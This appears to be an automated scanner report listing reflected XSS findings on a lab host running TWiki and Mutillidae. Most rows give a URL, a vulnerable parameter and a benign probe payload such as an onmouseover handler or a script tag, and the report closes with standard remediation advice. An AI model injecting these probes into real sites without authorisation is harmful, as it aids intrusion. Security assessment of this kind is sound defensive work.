http://192.168.105.200/twiki/bin/oops/TWiki/top?template=oopsmore&param1=1.1&param2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/top?template=oopsmore&param1=1.1&param2=1.1 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='aWAd(5990)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/WikiTopic?template=oopsmore&param1=1.5&param2=1.5 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WikiTopic?template=oopsmore&param1=1.5&param2=1.5 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='Flox(1409)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/TextFormattingRules?template=oopsmore&param1=1.1&param2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TextFormattingRules?template=oopsmore&param1=1.1&param2=1.1 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='VYHS(9431)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/sit?template=oopsmore&param1=1.1&param2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/sit?template=oopsmore&param1=1.1&param2=1.1 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='sCPs(7861)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?topicparent=TWiki.TWikiSystemRequirements | Target: http://192.168.105.200/twiki/bin/edit/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?topicparent=TWiki.TWikiSystemRequirements has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='QzzM(4035)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/WikiWikiClonesWTgdervMRixdShSobfKoAkuh?topicparent=TWiki.WikiWikiClonesWTgdervMRixdShSobfKoAkuh | Target: http://192.168.105.200/twiki/bin/edit/TWiki/WikiWikiClonesWTgdervMRixdShSobfKoAkuh?topicparent=TWiki.WikiWikiClonesWTgdervMRixdShSobfKoAkuh has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='QjLv(5485)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/bad?template=oopsmore&param1=1.1&param2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/bad?template=oopsmore&param1=1.1&param2=1.1 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='VDVU(9666)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhtsSQjEWAZxwfBR?template=oopsmore&param1=1.12&param2=1.12 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhtsSQjEWAZxwfBR?template=oopsmore&param1=1.12&param2=1.12 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='dial(4055)'bad=" |
http://192.168.105.200/mutillidae/?page=text-file-viewer.php | Target: http://192.168.105.200/mutillidae/?page=text-file-viewer.php has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: page, vulnerabilitypayload:"onmouseover='gUXw(5110)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiSystemRequirements?template=oopsmore&param1=1.35&param2=1.35 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiSystemRequirements?template=oopsmore&param1=1.35&param2=1.35 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='TntV(1629)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicEditTemplateiCGgrIzcEefnNtsCWGvTdVpE?template=oopsmore&param1=1.6&param2=1.6 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicEditTemplateiCGgrIzcEefnNtsCWGvTdVpE?template=oopsmore&param1=1.6&param2=1.6 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='MZlm(4554)'bad=" |
http://192.168.105.200/twiki/bin/edit/Main/WebSearch?topicparent=Main.WebHome | Target: http://192.168.105.200/twiki/bin/edit/Main/WebSearch?topicparent=Main.WebHome has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='HpnB(8131)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/TWikiSkins?topicparent=TWiki.TWikiSystemRequirements | Target: http://192.168.105.200/twiki/bin/edit/TWiki/TWikiSkins?topicparent=TWiki.TWikiSystemRequirements has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='VoVU(1751)'bad=" |
http://192.168.105.200/mutillidae/?page=add-to-your-blog.php | Target: http://192.168.105.200/mutillidae/?page=add-to-your-blog.php has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: page, vulnerabilitypayload:"onmouseover='lpnO(9182)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/GoodStyle?template=oopsmore&param1=1.1&param2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/GoodStyle?template=oopsmore&param1=1.1&param2=1.1 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='sbMS(7039)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/WikiNotation?template=oopsmore&param1=1.3&param2=1.3 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WikiNotation?template=oopsmore&param1=1.3&param2=1.3 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='xltb(6335)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicViewTemplate?template=oopsmore&param1=1.6&param2=1.6 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicViewTemplate?template=oopsmore&param1=1.6&param2=1.6 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='YTNk(8918)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/JavaScript?topicparent=TWiki.TWikiSystemRequirements | Target: http://192.168.105.200/twiki/bin/edit/TWiki/JavaScript?topicparent=TWiki.TWikiSystemRequirements has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='ycYf(2421)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?template=oopsmore&param1=1.13&param2=1.13 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?template=oopsmore&param1=1.13&param2=1.13 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='BdYH(6576)'bad=" |
http://192.168.105.200/twiki/bin/oops/Main/WebStatisticseoqWHqiUWCDa?template=oopsmore&param1=1.33&param2=1.33 | Target: http://192.168.105.200/twiki/bin/oops/Main/WebStatisticseoqWHqiUWCDa?template=oopsmore&param1=1.33&param2=1.33 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='pZJp(6331)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/AVeryLongTWikiTopicNameIsAlsoPossible?topicparent=TWiki.WikiNotation | Target: http://192.168.105.200/twiki/bin/edit/TWiki/AVeryLongTWikiTopicNameIsAlsoPossible?topicparent=TWiki.WikiNotation has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='xhZI(3986)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/SimultaneousEdits?topicparent=TWiki.MainFeatures | Target: http://192.168.105.200/twiki/bin/edit/TWiki/SimultaneousEdits?topicparent=TWiki.MainFeatures has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='iABL(6212)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/GoodStylebmCSuNsfoYww?template=oopsmore&param1=1.8&param2=1.8 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/GoodStylebmCSuNsfoYww?template=oopsmore&param1=1.8&param2=1.8 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='cAZV(3809)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/WikiWordzXXHVlcqHCKC?template=oopsmore&param1=1.10&param2=1.10 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WikiWordzXXHVlcqHCKC?template=oopsmore&param1=1.10&param2=1.10 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='ySpY(7995)'bad=" |
http://192.168.105.200/twiki/bin/edit/Main/PeterThoeny?topicparent=Main.WebHome | Target: http://192.168.105.200/twiki/bin/edit/Main/PeterThoeny?topicparent=Main.WebHome has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='Zpfk(9499)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/TWikiTemplates?topicparent=TWiki.TWikiSystemRequirements | Target: http://192.168.105.200/twiki/bin/edit/TWiki/TWikiTemplates?topicparent=TWiki.TWikiSystemRequirements has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='kGST(8233)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/YouAreHereswsMZQFRDgCN?t=1595894872&topicparent=3399023886140 | Target: http://192.168.105.200/twiki/bin/edit/TWiki/YouAreHereswsMZQFRDgCN?t=1595894872&topicparent=3399023886140 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='VXnw(5084)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhtsSQjEWAZxwfBR?t=1595894700&topicparent=9113892988903 | Target: http://192.168.105.200/twiki/bin/edit/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhtsSQjEWAZxwfBR?t=1595894700&topicparent=9113892988903 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='wcKY(7942)'bad=" |
http://192.168.105.200/twiki/bin/edit/Test/TestTopic3?topicparent=TWiki.TWikiTutorial | Target: http://192.168.105.200/twiki/bin/edit/Test/TestTopic3?topicparent=TWiki.TWikiTutorial has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='bciC(1443)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiTutorial?template=oopsmore&param1=1.13&param2=1.13 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiTutorial?template=oopsmore&param1=1.13&param2=1.13 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='MSdo(9700)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicNonWikiTemplatelFFzAgbwhaVq?template=oopsmore&param1=1.7&param2=1.7 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicNonWikiTemplatelFFzAgbwhaVq?template=oopsmore&param1=1.7&param2=1.7 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='qUdy(5462)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/TWikiSkinsqJwHYuIeNWcx?topicparent=TWiki.MainFeatures | Target: http://192.168.105.200/twiki/bin/edit/TWiki/TWikiSkinsqJwHYuIeNWcx?topicparent=TWiki.MainFeatures has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='QQCG(7210)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/bad?t=1595894692&topicparent=3543008140103 | Target: http://192.168.105.200/twiki/bin/edit/TWiki/bad?t=1595894692&topicparent=3543008140103 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='Xman(7281)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/WebTopicEditTemplateiCGgrIzcEefnNtsCWGvTdVpE?t=1595894883&topicparent=4428986529524 | Target: http://192.168.105.200/twiki/bin/edit/TWiki/WebTopicEditTemplateiCGgrIzcEefnNtsCWGvTdVpE?t=1595894883&topicparent=4428986529524 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='jTKQ(5623)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/WebPreferences?template=oopsmore&param1=1.38&param2=1.38 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebPreferences?template=oopsmore&param1=1.38&param2=1.38 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='NOkX(1910)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/WelcomeGuestqnNLAFixLaFquPpnlsYVRFCM?template=oopsmore&param1=1.42&param2=1.42 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WelcomeGuestqnNLAFixLaFquPpnlsYVRFCM?template=oopsmore&param1=1.42&param2=1.42 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='cYQR(9849)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/NewTopic?topicparent=TWiki.WikiSyntaxzZCcGwUsIOEXJrxLzSaAuvSU | Target: http://192.168.105.200/twiki/bin/edit/TWiki/NewTopic?topicparent=TWiki.WikiSyntaxzZCcGwUsIOEXJrxLzSaAuvSU has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='UKwi(8200)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/TWikiPlugins?topicparent=TWiki.TWikiSystemRequirements | Target: http://192.168.105.200/twiki/bin/edit/TWiki/TWikiPlugins?topicparent=TWiki.TWikiSystemRequirements has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='seKg(8132)'bad=" |
http://192.168.105.200/mutillidae/index.php?page=password-generator.php&username=anonymous | Target: http://192.168.105.200/mutillidae/index.php?page=password-generator.php&username=anonymous has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: username, vulnerabilitypayload:2730*/():;8017 |
http://192.168.105.200/twiki/bin/edit/Sandbox/TestTopic3?topicparent=TWiki.TWikiTutorial | Target: http://192.168.105.200/twiki/bin/edit/Sandbox/TestTopic3?topicparent=TWiki.TWikiTutorial has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='hHwb(8895)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/WikiWord?topicparent=TWiki.WikiName | Target: http://192.168.105.200/twiki/bin/edit/TWiki/WikiWord?topicparent=TWiki.WikiName has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='oSgi(5904)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/WebRss?topicparent=TWiki.WebRssBasepqdJdCubYLBE | Target: http://192.168.105.200/twiki/bin/edit/TWiki/WebRss?topicparent=TWiki.WebRssBasepqdJdCubYLBE has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='UyJo(9996)'bad=" |
http://192.168.105.200/mutillidae/index.php?do=toggle-security&page=home.php | Target: http://192.168.105.200/mutillidae/index.php?do=toggle-security&page=home.php has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: page, vulnerabilitypayload:"onmouseover='qbfZ(3151)'bad=" |
http://192.168.105.200/mutillidae/index.php?page=home.php | Target: http://192.168.105.200/mutillidae/index.php?page=home.php has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: page, vulnerabilitypayload:"onmouseover='pxft(9251)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/WikiWikiClonesWTgdervMRixdShSobfKoAkuh?template=oopsmore&param1=1.6&param2=1.6 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WikiWikiClonesWTgdervMRixdShSobfKoAkuh?template=oopsmore&param1=1.6&param2=1.6 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='uoPe(4619)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/MainFeatures?template=oopsmore&param1=1.13&param2=1.13 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/MainFeatures?template=oopsmore&param1=1.13&param2=1.13 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='gLxV(2864)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/WebRssgFJiGmbjzLvK?template=oopsmore&param1=1.2&param2=1.2 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebRssgFJiGmbjzLvK?template=oopsmore&param1=1.2&param2=1.2 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='ZMdq(7895)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/Bad?topicparent=TWiki.bad | Target: http://192.168.105.200/twiki/bin/edit/TWiki/Bad?topicparent=TWiki.bad has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='QlWz(8267)'bad=" |
http://192.168.105.200/mutillidae/index.php?page=captured-data.php | Target: http://192.168.105.200/mutillidae/index.php?page=captured-data.php has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: page, vulnerabilitypayload:"onmouseover='CeJS(6430)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/WindowsInstallCookbook?topicparent=TWiki.TWikiSystemRequirements | Target: http://192.168.105.200/twiki/bin/edit/TWiki/WindowsInstallCookbook?topicparent=TWiki.TWikiSystemRequirements has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='BAGH(3336)'bad=" |
http://192.168.105.200/twiki/bin/edit/Main/WebStatisticseoqWHqiUWCDa?t=1595894699&topicparent=2121092733961 | Target: http://192.168.105.200/twiki/bin/edit/Main/WebStatisticseoqWHqiUWCDa?t=1595894699&topicparent=2121092733961 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='hhUv(3920)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/TWikiSystemRequirements?t=1595894774&topicparent=3624168514383 | Target: http://192.168.105.200/twiki/bin/edit/TWiki/TWikiSystemRequirements?t=1595894774&topicparent=3624168514383 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='OYsf(5872)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/WikiName?template=oopsmore&param1=1.3&param2=1.3 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WikiName?template=oopsmore&param1=1.3&param2=1.3 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='PvBK(7846)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/TWikiPluginszAOpGaKKTRsS?topicparent=TWiki.TWikiSystemRequirements | Target: http://192.168.105.200/twiki/bin/edit/TWiki/TWikiPluginszAOpGaKKTRsS?topicparent=TWiki.TWikiSystemRequirements has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='hUsL(8843)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/FileAttachment?topicparent=TWiki.TWikiSystemRequirements | Target: http://192.168.105.200/twiki/bin/edit/TWiki/FileAttachment?topicparent=TWiki.TWikiSystemRequirements has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='SOid(1834)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/whether?template=oopsmore&param1=1.1&param2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/whether?template=oopsmore&param1=1.1&param2=1.1 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='WISF(5898)'bad=" |
http://192.168.105.200/twiki/bin/oops/Main/WebHome?template=oopsmore&param1=1.1&param2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/Main/WebHome?template=oopsmore&param1=1.1&param2=1.1 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='DdrR(9224)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/WikiWikiClonesWTgdervMRixdShSobfKoAkuh?t=1595894964&topicparent=8604613835626 | Target: http://192.168.105.200/twiki/bin/edit/TWiki/WikiWikiClonesWTgdervMRixdShSobfKoAkuh?t=1595894964&topicparent=8604613835626 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='yCbE(8644)'bad=" |
http://192.168.105.200/twiki/bin/oops/Main/TWikiAdminGroup?template=oopsmore&param1=1.20&param2=1.20 | Target: http://192.168.105.200/twiki/bin/oops/Main/TWikiAdminGroup?template=oopsmore&param1=1.20&param2=1.20 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='Hsqa(8711)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/WebRssgFJiGmbjzLvK?t=1595894922&topicparent=0277026118457 | Target: http://192.168.105.200/twiki/bin/edit/TWiki/WebRssgFJiGmbjzLvK?t=1595894922&topicparent=0277026118457 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='uAzz(9136)'bad=" |
http://192.168.105.200/twiki/bin/oops/Main/WebHomeoUiOyhwtrYHibJggYyZwaerd?template=oopsmore&param1=1.24&param2=1.24 | Target: http://192.168.105.200/twiki/bin/oops/Main/WebHomeoUiOyhwtrYHibJggYyZwaerd?template=oopsmore&param1=1.24&param2=1.24 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='tiQU(3083)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/WebRssBasepqdJdCubYLBE?template=oopsmore&param1=1.4&param2=1.4 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebRssBasepqdJdCubYLBE?template=oopsmore&param1=1.4&param2=1.4 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='iFJK(9156)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/WindowsInstallCookbookQPyVVfTNrWmC?topicparent=TWiki.TWikiSystemRequirements | Target: http://192.168.105.200/twiki/bin/edit/TWiki/WindowsInstallCookbookQPyVVfTNrWmC?topicparent=TWiki.TWikiSystemRequirements has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='erMb(8113)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/WIKILOGOIMG?template=oopsmore&param1=1.1&param2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WIKILOGOIMG?template=oopsmore&param1=1.1&param2=1.1 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='djZh(6990)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/WikiWordzXXHVlcqHCKC?t=1595894703&topicparent=6550651805478 | Target: http://192.168.105.200/twiki/bin/edit/TWiki/WikiWordzXXHVlcqHCKC?t=1595894703&topicparent=6550651805478 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='fdTC(3813)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/WebHome?topicparent=TWiki.WebTopicViewTemplate | Target: http://192.168.105.200/twiki/bin/edit/TWiki/WebHome?topicparent=TWiki.WebTopicViewTemplate has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='IMyh(7102)'bad=" |
http://192.168.105.200/twiki/bin/oops/Main/WebHome?template=oopsaccessgroup&param1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/Main/WebHome?template=oopsaccessgroup&param1=Main.TWikiAdminGroup has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:<ScRiPt >AtVH(7370)</ScRiPt> |
http://192.168.105.200/mutillidae/?page=show-log.php | Target: http://192.168.105.200/mutillidae/?page=show-log.php has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: page, vulnerabilitypayload:"onmouseover='ZDul(1654)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/WebHomeaAiLtumIynHm?template=oopsmore&param1=1.121&param2=1.121 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebHomeaAiLtumIynHm?template=oopsmore&param1=1.121&param2=1.121 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='ocyo(2010)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/WebTopicList?t=1595894707&topicparent=8108477134234 | Target: http://192.168.105.200/twiki/bin/edit/TWiki/WebTopicList?t=1595894707&topicparent=8108477134234 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='anvY(4813)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/TWikiUpgradeGuide?topicparent=TWiki.WebHomeaAiLtumIynHm | Target: http://192.168.105.200/twiki/bin/edit/TWiki/TWikiUpgradeGuide?topicparent=TWiki.WebHomeaAiLtumIynHm has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='YwIN(2072)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/WebRssBasepqdJdCubYLBE?t=1595894890&topicparent=0712104769119 | Target: http://192.168.105.200/twiki/bin/edit/TWiki/WebRssBasepqdJdCubYLBE?t=1595894890&topicparent=0712104769119 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='blph(8951)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiPreferencesoWuBVEKVgQrg?template=oopsmore&param1=1.54&param2=1.54 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiPreferencesoWuBVEKVgQrg?template=oopsmore&param1=1.54&param2=1.54 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='XrtI(9115)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/FreshTopic?topicparent=TWiki.WikiSyntaxzZCcGwUsIOEXJrxLzSaAuvSU | Target: http://192.168.105.200/twiki/bin/edit/TWiki/FreshTopic?topicparent=TWiki.WikiSyntaxzZCcGwUsIOEXJrxLzSaAuvSU has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='Ocvu(1851)'bad=" |
http://192.168.105.200/twiki/bin/edit/Main/TWikiGroups?topicparent=Main.WebSearch | Target: http://192.168.105.200/twiki/bin/edit/Main/TWikiGroups?topicparent=Main.WebSearch has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='kapU(5967)'bad=" |
http://192.168.105.200/twiki/bin/oops/Main/WIKILOGOIMG?template=oopsmore&param1=1.1&param2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/Main/WIKILOGOIMG?template=oopsmore&param1=1.1&param2=1.1 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='Cshr(9544)'bad=" |
# | Reference |
---|---|
1 | https://www.owasp.org/index.php/Reflected_DOM_Injection |
1. At the point where user input is received, filter as strictly as possible based on what is expected or valid input.
2. At the point where user-controllable data is output in HTTP responses, encode the output to prevent it from being interpreted as active content. Depending on the output context, this might require applying combinations of HTML, URL, JavaScript, and CSS encoding.
3. To prevent XSS in HTTP responses that aren't intended to contain any HTML or JavaScript, you can use the Content-Type and X-Content-Type-Options headers to ensure that browsers interpret the responses in the way you intend.
4. You can use Content Security Policy (CSP) to reduce the severity of any XSS vulnerabilities that still occur.

